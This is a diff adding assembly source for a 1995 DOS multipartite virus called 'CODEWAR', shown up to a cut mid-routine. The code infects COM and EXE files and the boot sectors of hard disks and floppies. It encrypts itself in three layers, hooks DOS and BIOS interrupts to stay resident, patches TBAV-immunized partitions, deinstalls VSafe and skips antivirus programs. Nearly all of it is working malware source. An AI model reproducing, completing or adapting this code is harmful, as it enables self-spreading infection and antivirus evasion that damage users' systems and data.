--- /dev/null
+;-------------------------------------------------------------------------\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+; C O D E W A R V i r u s\r
+;\r
+;\r
+; Programming by Sirius & Mindmaniac\r
+;\r
+;\r
+; Germany 1995.\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;---------------------------------------------------------------------------\r
+;\r
+;\r
+;\r
+; Please note:\r
+; --------------\r
+;\r
+; This programme introduces into the technique of multipartite viruses.\r
+; Pass to responsible people only!\r
+;\r
+;\r
+;\r
+;\r
+;\r
+; Features:\r
+; -------------\r
+;\r
+; - Infection Type: - COM files,\r
+; - EXE files\r
+; - Master Boot Record (MBR) on Hard Disk Drives\r
+; - Boot Sector (BS) on Floppy Disk Drives\r
+; ( 1.44 Mb + 1.2 Mb )\r
+;\r
+;\r
+; - Encryption: 3-layer-enryption (generic)\r
+;\r
+; - Memory resident (Bootsector virus technique)\r
+;\r
+; - Retro features.\r
+;\r
+; - Similarities: Alive (File Virus), Junkie (Multipartite Virus)\r
+;\r
+;\r
+;\r
+;\r
+;\r
+; Additional Notes:\r
+; -------------------\r
+;\r
+; Infected objects are not detected by SSC Anti-Virus Scanner and\r
+; Analyzer.\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+Ofs equ Offset\r
+Cmt equ Comment\r
+B equ byte ptr\r
+W equ word ptr\r
+\r
+Directory STRUC\r
+DS_Drive db ?\r
+DS_File_Name db 8 dup(0)\r
+DS_File_Ext db 3 dup(0)\r
+DS_File_Attr db ?\r
+DS_Reserved db 10 dup(0)\r
+DS_Time dw ?\r
+DS_Date dw ?\r
+DS_Start_Clust dw ?\r
+DS_File_Size dd ?\r
+Directory ENDS\r
+\r
+FCB STRUC\r
+FCB_Drive db ?\r
+FCB_File_Name db 8 dup(0)\r
+FCB_File_Ext db 3 dup(0)\r
+FCB_Block dw ?\r
+FCB_Rec_Size dw ?\r
+FCB_File_Size dd ?\r
+FCB_File_Date dw ?\r
+FCB_File_Time dw ?\r
+FCB_Reserved db 8 dup(0)\r
+FCB_Record db ?\r
+FCB_Random dd ?\r
+FCB ENDS\r
+\r
+DTA STRUC\r
+DTA_Reserved db 21 dup(0)\r
+DTA_File_Attr db ?\r
+DTA_File_Time1 db ? ; = seconds\r
+DTA_File_Time2 db ?\r
+DTA_File_Date dw ?\r
+DTA_File_Size dd ?\r
+DTA_File_Name db 13 dup(0)\r
+DTA ENDS\r
+\r
+SFT STRUC\r
+SFT_Reserved1 dw ? ; 0\r
+SFT_Open_Mode dw ? ; 2\r
+SFT_File_Attr db ? ; 4\r
+SFT_Reserved2 dw ? ; 5\r
+SFT_Reserved3 dd ? ; 7\r
+SFT_Reserved4 dw ? ; 11\r
+SFT_File_Time dw ? ; 13\r
+SFT_File_Date dw ? ; 15\r
+SFT_File_SizeLo dw ? ; 17\r
+SFT_File_SizeHi dw ? ; 19\r
+SFT_Curr_OfsLo dw ? ; 21\r
+SFT_Curr_OfsHi dw ? ; 23\r
+SFT_Reserved7 dw ? ; 25\r
+SFT_Reserved8 dd ? ; 27\r
+SFT_Reserved9 db ? ; 31\r
+SFT_File_Name db 8 dup(?) ; 32 = 20h\r
+SFT_File_Ext db 3 dup(?) ; 40 = 28h\r
+SFT ENDS\r
+\r
+ExeH STRUC\r
+Buf_0h dw 0 ; "MZ" oder "ZM" (selten)\r
+Buf_2h dw 0 ; Last page size\r
+Buf_4h dw 0 ; Size in pages\r
+Buf_6h dw 0\r
+Buf_8h dw 0\r
+Buf_ah dw 0\r
+Buf_ch dw 0\r
+Buf_eh dw 0 ; SS\r
+Buf_10h dw 0 ; SP\r
+Buf_12h dw 0 ; CheckSum\r
+Buf_14h dw 0 ; IP\r
+Buf_16h dw 0 ; CS\r
+Buf_18h dw 0 ; WINDOWS Marker\r
+ExeH ENDS\r
+\r
+\r
+\r
+Flag_Exec_Infection equ 1\r
+\r
+ofs equ offset\r
+cmt equ comment\r
+\r
+Reloc = ofs Vir_Start\r
+Camouf = 2\r
+Enc_Word_Length = (Virus_Length/2)+1\r
+Virus_Length = 4*512\r
+Header_Length = 18h\r
+\r
+File_Type_COM = byte (Restore_COM-File_Type)-2\r
+File_Type_EXE = byte (Restore_EXE-File_Type)-2\r
+\r
+Media_Descriptor_144 = 0F0h\r
+Media_Descriptor_120 = 0F9h\r
+\r
+Vir_Len_Sectors = 4\r
+\r
+Vir_Harddisk_Track = 0\r
+Vir_Harddisk_Head = 0\r
+Vir_Harddisk_Sector = 4\r
+\r
+Vir_Floppy_120_Track = 79\r
+Vir_Floppy_120_Head = 1\r
+Vir_Floppy_120_Sector = 6\r
+\r
+Vir_Floppy_144_Track = 79\r
+Vir_Floppy_144_Head = 1\r
+Vir_Floppy_144_Sector = 15\r
+\r
+\r
+Names_HDD_Track = 0\r
+Names_HDD_Head = 0\r
+Names_HDD_Sector = 3\r
+\r
+\r
+; in bytes\r
+\r
+F_Min_LengthCOM = 3000\r
+F_Max_LengthCOM = 50000\r
+\r
+; in pages\r
+\r
+F_Min_LengthEXE = 6 ; = 3 kb\r
+F_Max_LengthEXE = 2000 ; = 1000 kb\r
+\r
+\r
+Time_Stamp = 13\r
+TOM_Decrement_value = 5\r
+\r
+\r
+ .286\r
+CODE SEGMENT BYTE PUBLIC 'CODE'\r
+ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING\r
+ ORG 0100h\r
+\r
+\r
+Sample:\r
+ jmp Vir_Start\r
+\r
+;----------------------------------------------------------------------------\r
+; allways start at seg:0000\r
+\r
+ org 100h+ 1*16\r
+;----------------------------------------------------------------------------\r
+\r
+Vir_Start:\r
+\r
+;----------------------------------------------------------------------------\r
+; 1st encryption layer (outer)\r
+;----------------------------------------------------------------------------\r
+ cld\r
+ mov CX,Enc_Word_Length\r
+\r
+ MOV bp,1234h\r
+ ORG $-2\r
+E1_Idx_Val dw ofs E1_Encrypted_Code\r
+\r
+ mov ax,1234h\r
+ ORG $-2\r
+E1_Key_Val dw 0\r
+\r
+ db 081h,3eh\r
+E1_Dec_Loop:\r
+ XOR Word Ptr cs:[bp],ax\r
+\r
+ inc bp\r
+ inc bp\r
+\r
+ dec cx\r
+\r
+ or cx,cx\r
+ jz E1_Loop_done\r
+\r
+ jmp short E1_Dec_Loop\r
+ db 09ah ;=CALL FAR\r
+E1_Loop_done:\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+E1_Encrypted_Code:\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; 2nd encryption layer (inner)\r
+;----------------------------------------------------------------------------\r
+ mov cx,(Enc_Word_Length/2) +1\r
+\r
+ MOV si,1234h\r
+ ORG $-2\r
+E2_Idx_Val dw ofs E2_Encrypted_Code\r
+\r
+ mov ax,1234h\r
+ ORG $-2\r
+E2_Key_Val_1 dw 0\r
+\r
+ mov bx,1234h\r
+ ORG $-2\r
+E2_Key_Val_2 dw 0\r
+\r
+E2_Dec_Loop:\r
+ xor w cs:[si],ax\r
+ inc si\r
+ inc si\r
+\r
+ xor w cs:[si],bx\r
+ inc si\r
+ inc si\r
+\r
+ loop short E2_Dec_Loop\r
+\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+E2_Encrypted_Code:\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; 3rd encryption layer (innerst)\r
+;----------------------------------------------------------------------------\r
+ mov cx,(Enc_Word_Length/3)+1\r
+\r
+ MOV si,1234h\r
+ ORG $-2\r
+E3_Idx_Val dw ofs E3_Encrypted_Code\r
+\r
+ mov ax,1234h\r
+ ORG $-2\r
+E3_Key_Val_1 dw 0\r
+\r
+ mov bx,1234h\r
+ ORG $-2\r
+E3_Key_Val_2 dw 0\r
+\r
+ mov dx,1234h\r
+ ORG $-2\r
+E3_Key_Val_3 dw 0\r
+\r
+E3_Dec_Loop:\r
+ xor w cs:[si],ax\r
+ inc si\r
+ inc si\r
+\r
+ xor w cs:[si],bx\r
+ inc si\r
+ inc si\r
+\r
+ xor w cs:[si],dx\r
+ inc si\r
+ inc si\r
+;Chg1+2\r
+ add ax,1234h\r
+ ORG $-2\r
+E3_Key_Change_1 dw 0\r
+\r
+ add bx,1234h\r
+ ORG $-2\r
+E3_Key_Change_2 dw 0\r
+\r
+ loop short E3_Dec_Loop\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+E3_Encrypted_Code:\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+ cld\r
+ mov ax,cs\r
+ or ax,ax\r
+ jnz Run_file\r
+ jmp Its_boottime\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; Restore program-header, the registers and go back to the program\r
+\r
+Exit_File:\r
+ pop es ds\r
+\r
+\r
+ db 0EBh ; JMP-short-opcode\r
+File_Type db File_Type_COM\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; restore the COM-host-file\r
+\r
+Restore_COM:\r
+ MOV DI,100h\r
+ push di\r
+\r
+ MOV Word Ptr cs:[DI],1234h\r
+ ORG $-2\r
+Rest1 dw 0c3c3h\r
+\r
+ MOV byte Ptr cs:[DI+2],12h\r
+ ORG $-1\r
+Rest2 db 0c3h\r
+\r
+ZeroRegsForHost:\r
+ mov cx,8\r
+nullup: push 0\r
+ loop nullup\r
+ popa\r
+\r
+ ret\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; restore the EXE-host-file\r
+\r
+Restore_EXE:\r
+ mov ax,ds ; DS = PSP !\r
+ add ax,10h ; + 100h bytes of PSP\r
+ add cs:[bx+ofs Old_CS -Reloc],ax ; = new CS\r
+ add ax,0000 ; + old SS\r
+ org $-2\r
+Old_SS dw ?\r
+ cli\r
+ mov ss,ax ; set SS\r
+ mov sp,0000 ; set SP\r
+ org $-2\r
+Old_SP dw ?\r
+ sti\r
+\r
+ call ZeroRegsForHost\r
+\r
+ db 0EAh ; = JMP Old_CS:Old_IP\r
+\r
+; In an EXE - header-values are stored here\r
+\r
+Old_ExeValues:\r
+Old_IP dw 0\r
+Old_CS dw 0\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+ db " PSYCHo-TECH GMBH 1995 "\r
+\r
+;----------------------------------------------------------------------------\r
+Run_File:\r
+\r
+; relocate\r
+ CALL Delta\r
+Delta:\r
+ POP BX\r
+ SUB BX,1234h\r
+ ORG $-2\r
+ dw ofs Delta -Reloc\r
+\r
+; save PSP\r
+ push ds es\r
+\r
+\r
+; assume segments\r
+ push cs cs\r
+ pop ds es\r
+\r
+; prepare the retf to Exit_File\r
+\r
+ push cs\r
+ lea ax,cs:[bx+ofs Exit_File -Reloc]\r
+ push ax\r
+\r
+; change CS, so we start at ofs 0 not 100h\r
+\r
+ mov ax,cs\r
+ SHR BX,4\r
+ ADD AX,BX\r
+ PUSH AX\r
+ MOV AX,ofs Continue -Reloc\r
+ PUSH AX\r
+ RETF\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Gag:\r
+ push ax ds\r
+ in al,40h\r
+ test al,1\r
+ jz Skip_Gag\r
+\r
+ mov ax,0b800h\r
+ mov ds,ax\r
+ mov word ptr ds:[(79*2)],00cf9h ;= lightred point "ù"\r
+Skip_Gag:\r
+ pop ds ax\r
+ ret\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Its_boottime:\r
+\r
+ call Gag\r
+\r
+ xor di,di\r
+ MOV DS,DI\r
+\r
+ mov si,7c00h+512\r
+\r
+; decrement RAM by xx kB\r
+\r
+ SUB Word Ptr DS:[0413h],TOM_Decrement_value\r
+ MOV AX,DS:[0413h]\r
+ MOV BX,40h\r
+ MUL BX\r
+ MOV ES,AX\r
+\r
+; move virus to TOM (xxxx bytes)\r
+\r
+ MOV CX,Virus_Length\r
+ CLD\r
+ REPZ MOVSB\r
+\r
+; set new INT 13h and 1Ch\r
+\r
+ CLI\r
+\r
+ MOV SI,4*13h\r
+ MOV DI,ofs Old_Int_13 -Reloc\r
+ MOV AX,ofs New_Int_13 -Reloc\r
+ CALL Get_Set_Int\r
+\r
+ MOV Byte Ptr ES:[ofs Got_Int_21 -Reloc],0\r
+\r
+ MOV SI,4*1ch\r
+ MOV DI,ofs Old_Int_1c -Reloc\r
+ MOV AX,ofs New_Int_1c -Reloc\r
+ CALL Get_Set_Int\r
+\r
+ STI\r
+\r
+; save INT 21h\r
+\r
+ MOV DI,ofs Old_Int_21 -Reloc\r
+ MOV SI,4*21h\r
+ MOVSW\r
+ MOVSW\r
+\r
+ mov di,7c00h\r
+\r
+; prepare RETF to orig PAR/BS\r
+\r
+ PUSH CS ;=0\r
+ PUSH DI ;=7c00h\r
+\r
+ push es\r
+ push ofs Boot_Finish -Reloc\r
+\r
+ PUSH CS\r
+ POP ES\r
+\r
+; restore the JUMP-Word and the patched PAR/BS\r
+\r
+ MOV SI,7c00h + 512 + BS_First_word -Reloc\r
+ MOVSW\r
+\r
+ mov di,7c00h + 60h ; offset of the patch-area\r
+ CALL Call_Move_20\r
+\r
+; Patch the TBAV immunized partition\r
+\r
+ cmp w cs:[7c00h+0dfh],"hT"\r
+ jne no_TB_partition\r
+ mov b cs:[7c00h+73h],0\r
+\r
+no_TB_partition:\r
+\r
+; goto Boot_Finish / infect C:\r
+\r
+ retf\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+New_Int_13:\r
+\r
+ cmp ax,0201h ; reading ?\r
+ JNZ Jump_Old_Int_13\r
+\r
+ CMP CX,0001h ; sector 1 and Track 0 ?\r
+ JNZ Jump_Old_Int_13\r
+\r
+ or dh,dh ; head 0 ?\r
+ jnz Jump_Old_Int_13\r
+\r
+ pusha\r
+ PUSH DS\r
+ PUSH ES\r
+\r
+ CALL Int13_Works\r
+\r
+ POP ES\r
+ POP DS\r
+ popa\r
+\r
+Jump_Old_Int_13:\r
+ jmp dword ptr cs:(ofs Old_Int_13 -Reloc)\r
+\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Call_Old_Int_13:\r
+ PUSHF\r
+ call dword ptr cs:(ofs Old_Int_13 -Reloc)\r
+ RET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+ db " >>> BRAVEd DANGER 4 BRAVE PEOPLe <<< "\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Continue:\r
+ PUSH DS\r
+ PUSH ES\r
+\r
+ XOR AX,AX\r
+ MOV DS,AX\r
+\r
+ PUSH CS\r
+ POP ES\r
+\r
+; save int 13h\r
+\r
+ MOV DI,ofs Old_Int_13 -Reloc\r
+ MOV SI,4*13h\r
+ CLD\r
+ MOVSW\r
+ MOVSW\r
+ JMP Short Read_Drive_C\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Boot_Finish:\r
+ PUSH DS\r
+ PUSH ES\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Read_Drive_C:\r
+ MOV AH,02h\r
+ MOV DL,80h\r
+\r
+ CALL Int13_Works ; infect drive C\r
+\r
+ POP ES\r
+ POP DS\r
+\r
+ XOR AX,AX\r
+ XOR BX,BX\r
+ retf\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Int13_Works:\r
+\r
+ PUSH CS\r
+ POP DS\r
+ PUSH CS\r
+ POP ES\r
+\r
+ CALL Read_or_Write_BS_from_A\r
+ jnb oky ; Goto_Ret\r
+ jmp Goto_Ret\r
+oky:\r
+\r
+\r
+ MOV DI,ofs Buffer + 60h -Reloc\r
+\r
+; check if BS is infected\r
+\r
+ CMP Word Ptr [SI],05EEBh ; SI=@buffer\r
+ JNZ BS_not_infected\r
+\r
+ CMP Word Ptr [DI],0FF33h ; == xor di,di\r
+ JZ Goto_Ret\r
+\r
+BS_not_infected:\r
+\r
+; test if it is Harddisk or floppy\r
+\r
+ cmp dl,79h\r
+ ja Not_Floppy\r
+\r
+\r
+; test if HD 1.44 (=F0) or HD 1.2 (=F9) floppy\r
+\r
+ CMP Byte Ptr DS:[ofs Buffer+15h -Reloc],Media_Descriptor_144\r
+ JZ Found_ID_F0\r
+\r
+ CMP Byte Ptr DS:[ofs Buffer+15h -Reloc],Media_Descriptor_120\r
+ JNZ Goto_Ret\r
+\r
+Large_floppy:\r
+ MOV CL,Vir_Floppy_120_Sector\r
+ JMP Short Floppy_Disk\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; 1.44 floppy found\r
+\r
+Found_ID_F0:\r
+ MOV AX,40h\r
+ MOV DS,AX\r
+\r
+; 0:490h == AT Drive 0 status\r
+\r
+ CMP Byte Ptr DS:[0090h],97h\r
+ JZ Large_Floppy\r
+\r
+; it is 1.44 Mb\r
+\r
+ MOV CL,Vir_Floppy_144_Sector\r
+\r
+Floppy_Disk:\r
+ PUSH CS\r
+ POP DS\r
+\r
+ MOV CH,Vir_Floppy_120_Track\r
+ JMP Short Head_01\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Not_floppy:\r
+ MOV CX,Vir_Harddisk_Sector\r
+ JMP Short Head_00\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Head_01:\r
+ MOV DH,Vir_Floppy_120_Head\r
+Head_00:\r
+ MOV DS:[ofs Ptc_CX -Reloc],CX ; patch the PAR\r
+ MOV DS:[ofs Ptc_DX -Reloc],DX\r
+\r
+ PUSH DX\r
+ PUSH CX\r
+ PUSH SI\r
+ PUSH DI\r
+\r
+; Move the JMP-Op to the beginning of BS/PAR\r
+\r
+ MOV DI,ofs BS_first_word -Reloc ; SI=ofs buffer\r
+ MOVSW\r
+ POP SI\r
+\r
+ CALL Call_Move_20\r
+\r
+ MOV SI,DI\r
+ POP DI\r
+ MOVSW\r
+\r
+ add di,60h-2\r
+ CALL Call_Move_20 \r
+\r
+; write BS\r
+\r
+ MOV AX,0301h\r
+ PUSH AX\r
+ CALL Read_or_Write_BS_from_A\r
+\r
+ POP AX\r
+ POP CX\r
+ POP DX\r
+\r
+ MOV AL,Vir_Len_Sectors\r
+ MOV BX,ofs Buffer -Reloc\r
+ JB Goto_Ret\r
+\r
+\r
+ MOV Word Ptr DS:[ofs E1_Idx_Val -Reloc],7c00h +512+E1_Encrypted_Code -Reloc -Camouf\r
+ MOV Word Ptr DS:[ofs E2_Idx_Val -Reloc],7c00h +512+E2_Encrypted_Code -Reloc\r
+ MOV Word Ptr DS:[ofs E3_Idx_Val -Reloc],7c00h +512+E3_Encrypted_Code -Reloc\r
+\r
+\r
+ CALL Encrypt_Virus\r
+\r
+ CALL Call_Old_Int_13\r
+Goto_Ret:\r
+ RET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; read the PAR/BS from drive\r
+;----------------------------------------------------------------------------\r
+\r
+Read_or_Write_BS_from_A:\r
+ MOV AL,01h\r
+ MOV CX,0001h\r
+ MOV DH,0\r
+ MOV BX,ofs Buffer -Reloc\r
+ MOV SI,BX\r
+\r
+ PUSH DX\r
+ CALL Call_Old_Int_13\r
+ POP DX\r
+\r
+ RET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Call_Move_20:\r
+ MOV CX,32\r
+ CLD\r
+ REPZ MOVSb\r
+ RET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Get_Set_Int:\r
+\r
+ PUSH SI\r
+ MOVSW\r
+ MOVSW\r
+ POP SI\r
+ MOV [SI],AX\r
+ MOV [SI+2],ES\r
+ RET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Get_Random:\r
+\r
+;; xor ax,ax\r
+;; ret\r
+\r
+ push cx dx\r
+\r
+ in al,40h\r
+ mov cl,al\r
+\r
+ xor ax,ax\r
+ int 1ah\r
+\r
+ in al,40h\r
+ mov ah,al\r
+\r
+ in al,40h\r
+ rol ax,cl\r
+\r
+ pop dx cx\r
+ ret\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;============================================================================\r
+Encrypt_Virus:\r
+\r
+ pusha\r
+ push ds es\r
+\r
+; get (random) key-values\r
+\r
+; L1\r
+ call Get_Random\r
+ MOV word ptr cs:[ofs E1_Key_Val -Reloc],ax\r
+\r
+; L2\r
+ call Get_Random\r
+ MOV word ptr cs:[ofs E2_Key_Val_1 -Reloc],ax\r
+\r
+ call Get_Random\r
+ MOV word ptr cs:[ofs E2_Key_Val_2 -Reloc],ax\r
+\r
+; L3\r
+ call Get_Random\r
+ MOV word ptr cs:[ofs E3_Key_Val_1 -Reloc],ax\r
+\r
+ call Get_Random\r
+ MOV word ptr cs:[ofs E3_Key_Val_2 -Reloc],ax\r
+\r
+ call Get_Random\r
+ MOV word ptr cs:[ofs E3_Key_Val_3 -Reloc],ax\r
+\r
+ call Get_Random\r
+ MOV word ptr cs:[ofs E3_Key_Change_1 -Reloc],ax\r
+\r
+ call Get_Random\r
+ MOV word ptr cs:[ofs E3_Key_Change_2 -Reloc],ax\r
+\r
+\r
+; move bytes\r
+\r
+ PUSH CS\r
+ POP ES\r
+\r
+ MOV SI,1234h\r
+ org $-2\r
+ dw 0\r
+\r
+ MOV DI,ofs Buffer -Reloc\r
+ MOV CX,(ofs Encrypted_Code_End - ofs Vir_Start)\r
+ REPZ MOVSB\r
+\r
+\r
+; fill\r
+\r
+ pusha\r
+ mov cx,2*80\r
+Fill_random:\r
+ in al,40h\r
+ cld\r
+ stosb\r
+ loop Fill_random\r
+ popa\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; encrypt innerst layer E3\r
+\r
+ MOV w ax,cs:[ofs E3_Key_Val_1 -Reloc]\r
+ MOV w bx,cs:[ofs E3_Key_Val_2 -Reloc]\r
+ MOV w dx,cs:[ofs E3_Key_Val_3 -Reloc]\r
+\r
+;chg1+2\r
+ MOV w di,cs:[ofs E3_Key_Change_1 -Reloc]\r
+ MOV w bp,cs:[ofs E3_Key_Change_2 -Reloc]\r
+\r
+ MOV si,ofs Buffer -Reloc\r
+ ADD si,ofs E3_Encrypted_Code -Reloc\r
+\r
+ MOV CX,(Enc_Word_Length/3) +1\r
+\r
+C3_Enc_Loop:\r
+ XOR cs:[si],ax\r
+ INC si\r
+ INC si\r
+\r
+ XOR cs:[si],bx\r
+ INC si\r
+ INC si\r
+\r
+ XOR cs:[si],dx\r
+ INC si\r
+ INC si\r
+;chg1\r
+ add ax,di\r
+;chg2\r
+ add bx,bp\r
+\r
+ LOOP C3_Enc_Loop\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; encrypt inner layer E2\r
+\r
+ MOV w ax,cs:[ofs E2_Key_Val_1 -Reloc]\r
+ MOV w bx,cs:[ofs E2_Key_Val_2 -Reloc]\r
+\r
+ MOV si,ofs Buffer -Reloc\r
+ ADD si,ofs E2_Encrypted_Code -Reloc\r
+\r
+ MOV CX,(Enc_Word_Length/2) +1\r
+\r
+C2_Enc_Loop:\r
+ XOR cs:[si],ax\r
+ INC si\r
+ INC si\r
+\r
+ XOR cs:[si],bx\r
+ INC si\r
+ INC si\r
+\r
+ LOOP C2_Enc_Loop\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; encrypt outer layer E1\r
+\r
+ MOV word ptr bx,cs:[ofs E1_Key_Val -Reloc]\r
+\r
+ MOV DI,ofs Buffer -Reloc\r
+ ADD DI,ofs E1_Encrypted_Code -Reloc\r
+\r
+ MOV CX,Enc_Word_Length\r
+\r
+Enc_Loop:\r
+ XOR cs:[DI],BX\r
+ INC DI\r
+ INC DI\r
+ LOOP Enc_Loop\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+Mult_POP:\r
+ pop es ds\r
+ popa\r
+\r
+ RET\r
+;============================================================================\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+New_Int_1c:\r
+ CMP Byte Ptr CS:[ofs Got_Int_21 -Reloc],1\r
+ JZ Jump_Int_1c\r
+\r
+ pusha\r
+ push ds es\r
+\r
+ MOV SI,4*21h\r
+ XOR AX,AX\r
+ MOV DS,AX\r
+\r
+; load int 20h seg and compare if below 800h\r
+\r
+ MOV AX,DS:[4*20h +2]\r
+\r
+ CMP AX,0000h\r
+ JZ Exit_Int_1c\r
+\r
+ CMP AX,800h\r
+ JA Exit_Int_1c\r
+\r
+; cmp with int 21h seg\r
+\r
+ CMP [SI+02h],AX\r
+ JNZ Exit_Int_1c\r
+\r
+; cmp with int 27h seg\r
+\r
+ CMP DS:[4*27h +2],AX\r
+ JNZ Exit_Int_1c\r
+\r
+; cmp with int 2Fh seg\r
+\r
+ CMP DS:[4*2Fh +2],AX\r
+ JNZ Exit_Int_1c\r
+\r
+; ok, now hook int 21h\r
+\r
+ CLI\r
+ MOV DI,ofs Old_Int_21 -Reloc\r
+ PUSH CS\r
+ POP ES\r
+ MOV AX,ofs New_Int_21 -Reloc\r
+ CALL Get_Set_Int\r
+\r
+; set the flag for it\r
+ MOV Byte Ptr CS:[ofs Got_Int_21 -Reloc],01h\r
+ STI\r
+\r
+; get int 2f vector\r
+\r
+ push 0\r
+ pop ds\r
+ mov w ax,ds:[4*2fh]\r
+ mov w cs:[ofs Old_Int_2f -Reloc],ax\r
+ mov w ax,ds:[4*2fh+2]\r
+ mov w cs:[ofs Old_Int_2f -Reloc+2],ax\r
+\r
+\r
+\r
+Exit_Int_1c:\r
+\r
+ pop es ds\r
+ popa\r
+\r
+Jump_Int_1c:\r
+ jmp dword ptr cs:(ofs Old_int_1c -Reloc)\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+New_Int_21:\r
+\r
+\r
+IF Flag_Exec_Infection\r
+ CMP AX,4B00h\r
+ JZ Control_Operation\r
+ENDIF\r
+\r
+\r
+ CMP AH,3Dh\r
+ JZ Control_Operation\r
+\r
+Exit_Int_21:\r
+ jmp dword ptr cs:(ofs Old_Int_21 -Reloc)\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Control_Operation:\r
+\r
+ pusha\r
+ push ds es\r
+\r
+Not_Ext_Open:\r
+ xchg ax,cx\r
+ xor ax,ax\r
+\r
+ call Deinstall_Vsafe\r
+\r
+; Hook int 24h\r
+\r
+ PUSH DS\r
+ MOV DS,AX\r
+ LES AX,DS:[4*24h]\r
+ MOV Word Ptr DS:[4*24h], ofs New_Int_24 -Reloc\r
+ MOV DS:[4*24h +2],CS\r
+ POP DS\r
+\r
+ PUSH ES\r
+ PUSH AX\r
+\r
+; open file\r
+\r
+ MOV AX,3D00h\r
+ call Call_Old_Int21\r
+ jb File_Error\r
+\r
+ mov bx,ax\r
+\r
+ PUSH CS\r
+ POP DS\r
+\r
+; get SFT\r
+\r
+ PUSH BX\r
+ MOV AX,1220h\r
+ call Call_Old_Int2F ; INT 2Fh\r
+\r
+ MOV AX,1216h\r
+ MOV BL,ES:[DI]\r
+ call Call_Old_Int2F ; INT 2Fh\r
+ POP BX\r
+\r
+ JB Close_Exit\r
+\r
+; skip AV-programs ?\r
+\r
+ call Check_If_AV_Name\r
+ jz goto_close_exit\r
+\r
+\r
+; test if executable-file\r
+\r
+ CMP Word Ptr ES:[DI+28h],"OC"\r
+ JZ Is_COM\r
+\r
+ CMP Word Ptr ES:[DI+28h],"XE"\r
+ JZ Is_EXE\r
+\r
+goto_close_exit:\r
+ JMP Short Close_Exit\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Is_COM:\r
+Is_EXE:\r
+\r
+; Check if infected\r
+ mov ax,es:[di.SFT_File_Time]\r
+ and al,00011111b\r
+ cmp al,Time_Stamp\r
+ jz Close_Exit\r
+\r
+ PUSH ES\r
+ PUSH DI\r
+\r
+; Datum/Zeit sichern\r
+ mov ax,es:[di.SFT_File_Time]\r
+ mov cs:[ofs Old_Time -Reloc],ax\r
+ mov ax,es:[di.SFT_File_Date]\r
+ mov cs:[ofs Old_Date -Reloc],ax\r
+\r
+; Get file length directly from the SFT and save it\r
+ mov ax,es:[di+SFT_File_SizeLo]\r
+ mov cs:[ofs File_SizeLo -Reloc], ax\r
+ mov ax,es:[di.SFT_File_SizeHi]\r
+ mov cs:[ofs File_SizeHi -Reloc], ax\r
+\r
+; Force read/write mode\r
+ mov word ptr es:[di.SFT_Open_Mode],2\r
+\r
+ CALL Read_Infect\r
+\r
+ POP DI\r
+ POP ES\r
+\r
+Close_Exit:\r
+\r
+ MOV AH,3Eh\r
+ INT 21h\r
+\r
+File_Error:\r
+ XOR SI,SI\r
+ MOV DS,SI\r
+\r
+; restore INT 24h\r
+\r
+ POP AX\r
+ POP ES\r
+\r
+ MOV DS:[4*24h],AX\r
+ MOV DS:[4*24h +2],ES\r
+\r
+\r
+ pop es ds\r
